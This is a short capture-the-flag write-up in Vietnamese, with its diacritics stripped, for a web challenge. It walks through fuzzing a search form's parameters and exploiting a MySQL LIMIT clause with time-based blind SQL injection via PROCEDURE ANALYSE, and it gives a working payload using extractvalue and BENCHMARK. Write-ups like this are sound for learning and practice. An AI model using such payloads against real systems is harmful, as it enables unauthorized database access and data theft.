Web100: sju:pe search engines

Mt trang web search rt n c bn nun :3

Search th xem post th thu c kt qu nh th ly:
keyword=superfish&limit=2&find=Submit+Query
Ok u tin mnh th fuzz sqli vo keyword trc, c th:
+ keyword=superfish-- + keyword=superfish-- + keyword=superfish)-- + keyword=superfish)-- Khng tr v kt qu, on rng trng ny b filter bng func
mysql_real_escape_string
Cho qua
Fuzz limit:
+limit=2 -- - => OK
+limit=100 => OK
+limit=2,1 => OK
+limit= 2 offset 0 => OK
ca tc gi chc l injection y ri.
Da theo kinh nghim sqli limit th c 2 dng, mt l s dng select case, if
else, 2 l s dng union based sqli, nhng khng thnh cng. Thi th qua
thm bc google vy.
Sau mt thi gian quay tay vi bc gc th cng thnh chnh qu :chaymau:
gii quyt bi ny mnh s dng phng php Time based blind kt hp
Procedure Analyse:
Ti liu: https://rateip.com/blog/sql-injections-in-mysql-limit-clause/
Ok th pht no
keyword=superfish&limit=1,1 PROCEDURE analyse((select
extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5,
BENCHMARK(5000000,SHA1(1)),1))))),1)&find=Submit+Query

alt + X (hackbar cho bn no khng bit) v d ngn tay ra m, 1->2->3->4->5

->bingo!
Ok blind thi:
<y l 1 on python m n lin ch c hiu lc trong bi ny>
http://pastebin.com/g7cv7xXd